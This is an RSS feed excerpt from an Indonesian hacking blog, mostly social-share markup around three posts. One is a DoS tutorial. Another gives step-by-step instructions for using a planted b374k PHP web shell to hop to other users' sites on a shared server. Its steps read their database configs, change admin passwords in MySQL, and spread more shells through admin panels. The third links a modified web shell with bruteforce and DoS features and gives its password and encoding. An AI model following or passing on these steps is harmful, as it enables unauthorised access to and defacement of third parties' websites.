			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;srcUrl=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;srcTitle=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;snippet=kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;t=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Tutorial%20Dos%20Attack%20untuk%20menjurus%20ke%20DDOS%22&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;bm_description=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;t=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS+-+http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS+-+http://bit.ly/fOTEG0&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;submitHeadline=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;submitSummary=kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial buat para jumper</title>
		<link>http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/</link>
		<comments>http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/#comments</comments>
		<pubDate>Mon, 07 Feb 2011 07:33:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Jaringan Komputer]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Pemerograman]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=251</guid>
		<description><![CDATA[<p>inget pilem jumper yg suka lompat <img title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /></p>
<p>kalo ini teknik sama suka lompat <img title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /> ke user lain satu server</p>
<p>oke mulai aja yah tutornya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> <span id="more-251"></span></p>
<p>1. <a href="http://www.james0baster.web.id/v2/2011/02/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a><br />
2. masukan passwordnya biar bisa akses shellnya<br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" width="632px" /></p>
<p>3. klik menu readable<br />
akan menghasilkan hasil scanan user yg readable<br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1178.snc4/155064_176829012341444_100000430395530_496956_7868734_n.jpg" border="0" alt="[Image: 155064_176829012341444_100000430395530_4...8734_n.jpg]" width="632px" /></p>
<p>4. copy salah satu list<br />
contoh :<span style="color: #ff0000;"> /home/gracepcc/public_html</span></p>
<p>5. klik menu explore</p>
<p>6. pastekan readable user yg sudah kita copy ke <span style="color: #ff0000;">View File/Folder</span></p>
<p>5. cari file konfigurasi koneksi ke database</p>
<p>6. login ke mysqlnya dengan mengklik menu</p>
<p>7. cari table user<br />
ubah password user tersebut</p>
<p>8. cari tau domain user tersebut<br />
ada beberapa cara :<br />
liat file konfigurasi ke database<br />
liat di dalam databse<br />
atau bisa membuka <span style="color: #ff0000;">domainygadashell.com/~user/</span><br />
contoh: <span style="color: #ff0000;">domainygadashell.com/~gracepcc/</span></p>
<p>9. login sebagai admin.<br />
kalo mau tau tempat loginnya bisa liat di shell, kan bisa liat ftpnya dia <img title="hmm" src="http://devilzc0de.org/forum/images/smilies/gg.gif" border="0" alt="hmm" /> tapi ga bisa upload <img title="mewek" src="http://devilzc0de.org/forum/images/smilies/mewek.gif" border="0" alt="mewek" /></p>
<p>cara mengatasi upload maka uploadnya via halaman admin web tersebut <img title="asik" src="http://devilzc0de.org/forum/images/smilies/asik.gif" border="0" alt="asik" /> <img title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /></p>
<p>jadih deh shell anda beranak pinak <img title="ngakak" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" border="0" alt="ngakak" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p>inget pilem jumper yg suka lompat <img title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /></p>
<p>kalo ini teknik sama suka lompat <img title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /> ke user lain satu server</p>
<p>oke mulai aja yah tutornya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> <span id="more-251"></span></p>
<p>1. <a href="http://www.james0baster.web.id/v2/2011/02/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a><br />
2. masukan passwordnya biar bisa akses shellnya<br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" width="632px" /></p>
<p>3. klik menu readable<br />
akan menghasilkan hasil scanan user yg readable<br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1178.snc4/155064_176829012341444_100000430395530_496956_7868734_n.jpg" border="0" alt="[Image: 155064_176829012341444_100000430395530_4...8734_n.jpg]" width="632px" /></p>
<p>4. copy salah satu list<br />
contoh :<span style="color: #ff0000;"> /home/gracepcc/public_html</span></p>
<p>5. klik menu explore</p>
<p>6. pastekan readable user yg sudah kita copy ke <span style="color: #ff0000;">View File/Folder</span></p>
<p>5. cari file konfigurasi koneksi ke database</p>
<p>6. login ke mysqlnya dengan mengklik menu</p>
<p>7. cari table user<br />
ubah password user tersebut</p>
<p>8. cari tau domain user tersebut<br />
ada beberapa cara :<br />
liat file konfigurasi ke database<br />
liat di dalam databse<br />
atau bisa membuka <span style="color: #ff0000;">domainygadashell.com/~user/</span><br />
contoh: <span style="color: #ff0000;">domainygadashell.com/~gracepcc/</span></p>
<p>9. login sebagai admin.<br />
kalo mau tau tempat loginnya bisa liat di shell, kan bisa liat ftpnya dia <img title="hmm" src="http://devilzc0de.org/forum/images/smilies/gg.gif" border="0" alt="hmm" /> tapi ga bisa upload <img title="mewek" src="http://devilzc0de.org/forum/images/smilies/mewek.gif" border="0" alt="mewek" /></p>
<p>cara mengatasi upload maka uploadnya via halaman admin web tersebut <img title="asik" src="http://devilzc0de.org/forum/images/smilies/asik.gif" border="0" alt="asik" /> <img title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /></p>
<p>jadih deh shell anda beranak pinak <img title="ngakak" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" border="0" alt="ngakak" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;n=Tutorial+buat+para+jumper&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper&amp;desc=inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;t=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Tutorial+buat+para+jumper&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper&amp;srcUrl=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;srcTitle=Tutorial+buat+para+jumper&amp;snippet=inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;t=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Tutorial+buat+para+jumper&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Tutorial%20buat%20para%20jumper%22&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;bm_description=Tutorial+buat+para+jumper&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;t=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Tutorial+buat+para+jumper+-+http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;title=Tutorial+buat+para+jumper" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Tutorial+buat+para+jumper+-+http://bit.ly/fcCQei&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/&amp;submitHeadline=Tutorial+buat+para+jumper&amp;submitSummary=inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Tutorial+buat+para+jumper&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A inget%20pilem%20jumper%20yg%20suka%20lompat%20%0D%0A%0D%0Akalo%20ini%20teknik%20sama%20suka%20lompat%20%20ke%20user%20lain%20satu%20server%0D%0A%0D%0Aoke%20mulai%20aja%20yah%20tutornya%20%3AD%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20readable%0D%0Aakan%20menghasilkan%20hasil%20scanan%20user%20yg%20readable%0D%0A%0D%0A%0D%0A4.%20c" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/tutorial-buat-para-jumper/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ngedit Script b374k</title>
		<link>http://www.james0baster.web.id/v2/ngedit-script-b374k/</link>
		<comments>http://www.james0baster.web.id/v2/ngedit-script-b374k/#comments</comments>
		<pubDate>Tue, 01 Feb 2011 09:10:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Pemerograman]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=225</guid>
		<description><![CDATA[<p>nih scriptnya copas ke notepad terus save dengan file tipe php <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  (*yg udah tau pasti <img title="hmm" src="http://devilzc0de.org/forum/images/smilies/gg.gif" border="0" alt="hmm" />)<br />
<a href="http://xjamesx.tk/404.txt" target="_blank"><span style="color: #ff0000;">http://xjamesx.tk/404.txt</span></a></p>
<p>ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS,<br />
dan pengunaan password untuk mengakses shell tersebut <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> <span id="more-225"></span><br />
<!--more--><br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1178.snc4/155064_176829012341444_100000430395530_496956_7868734_n.jpg" border="0" alt="[Image: 155064_176829012341444_100000430395530_4...8734_n.jpg]" width="632px" /></p>
<p>passwordnya = devilzc0de</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" width="632px" /></p>
<p>atau bisa ubah sendiri password hashnya dalam bentuk md5 <img title="mantap" src="http://devilzc0de.org/forum/images/smilies/top.gif" border="0" alt="mantap" /></p>
<h1><span style="color: #ff0000;"> UPGRADE SCRIPT</span></h1>
<p><a href="http://xjamesx.tk/404.txt" target="_blank"><span style="color: #ff0000;">http://xjamesx.tk/404.txt</span></a></p>
<p>ditambahkan DOS attack</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1373.snc4/164525_188139351210410_100000430395530_569776_2031231_n.jpg" border="0" alt="[Image: 164525_188139351210410_100000430395530_5...1231_n.jpg]" width="632px" /></p>
<h2><span style="color: #ff0000;">NB Script di encode biar ukurannya jadi lebih kecil aja</span></h2>
<p>kalo mau decode bisa make script php ini :</p>
<blockquote><p>gzinflate(base64_decode($scripygdiencode))</p></blockquote>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/ngedit-script-b374k/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
